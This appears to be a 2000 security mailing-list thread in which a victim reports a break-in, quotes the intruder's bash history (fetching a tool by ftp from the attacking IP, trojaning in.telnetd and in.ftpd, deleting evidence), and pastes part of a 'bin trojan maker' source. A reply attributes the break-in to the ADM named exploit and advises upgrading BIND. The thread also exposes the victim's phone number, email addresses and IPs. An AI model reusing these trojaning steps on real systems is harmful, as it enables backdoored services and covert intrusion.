Re: succesful crack **read

[nine () LOGICALHOST COM (nine)]

Bob, i have tracked down the person who has hacked your boxen for you. If
you would like to make an inquiry about who it is, or how to talk to them
directly, email nine () koncept fallen org.

- nine
- http://koncept.fallen.org

On Wed, 16 Feb 2000, Gene Harris wrote:

> On Tue, 15 Feb 2000, Bob Lockie wrote:
>
> >  rjlockie () home net
> >
> >  (613) 765-5409
> >
> >
> >  My box (24.112.89.219) was cracked.
> >
> >  The attack originated from  24.11.98.152 (c505000-a.blfld1.ct.home.com).
> >
> >  It could be this machine was also cracked and it was used as a launching point.
> >  Please contact the owner and have a talk with them.
> >  The owner should definitely not offer anonymous ftp service.
> >
> >  A few things were left on my system.
> >
> >  drwxr-xr-x   2 root     root         1024 Feb 13 22:03 ADMROCKS
> >
> >  I have no /etc/host.allow or /etc/hosts.deny files anymore.
> >
> >  This was in /tmp/,bash_history.
> >
> >  ftp 24.11.98.152
> >  tar -xvf btm.tar
> >  make
> >  ./btm /usr/sbin/in.telnetd
> >  ./btm /usr/sbin/in.ftpd
> >  rm -rf btm.tar
> >
> >  The following source:
> >
> >  /* bin trojan maker */
> >
> >  #include "btm.h"
> >
> >  #define BTM_VER "btm v1.5"
> >
> >
> >  int options=0;
> >
> >  void usage(char* progname)
> >  {
> >    printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u compiler]"
> >                  " [-o compiler options] target [trojan source]\n",progname);
> >    printf("in trojan source, the trojan function must be:\n");
> >    printf("  "TROJAN_FCT"(char** argv,char** envp)\n");
> >    printf("\n");
> >    printf("-d: debug mode\n");
> >    printf("-c: don't trojan, just put the C file on stdout\n");
> >    printf("-l max: max number of char in a line of the C file\n");
> >    printf("-v: display version\n");
> >    printf("-u compiler: use this compiler\n");
> >    printf("-o options: options for compiler\n");
> >    printf("-n: no save for target file\n");
> >    printf("-e: echo commands\n");
> >    printf("-m comments: put comments in btmized file\n");
> >    printf("\n");
> >    exit(0);
> >  }
> >
> >
> >  int getdirname(char* dirname,char* filename,size_t dirname_size)
> >  {
> >
> >    if (!filename) return -1;
> >
> >    if (filename[0]=='/') {
> >      strncpy(dirname,filename,dirname_size);
> >      *(((char*)strrchr(dirname,'/'))+1)=0;
> >    }
> >    else {
> >      if (!getcwd(dirname,dirname_size)) {
> >        perror("getcwd");
> >        return -1;
> >      }
> >    }
> >
> >    return 0;
> >  }
> >
> >
> >  /var/log/secure
> >  Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by (uid=0
> >  )
> >  Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5
> >  000)
> >
> >
> >
> >  Bob Lockie
> >  bjlockie () nortelnetworks com
> >
> >  Live long and prosper.
>
> You been the victim of a named daemon exploit.
>
> The ADM attack is effective against older versions of named.
> There have been discussions of ADMROCKS and the named
> exploit in this news group in the last several weeks.
> Upgrade named to 8.2.2-P3 at a minimum. If you are running
> RedHat 6.1, they have had an advisory out to upgrade bind
> (named) for quite some time.  Please check their support
> site -> errata -> security.
>
> Good Luck,
> Gene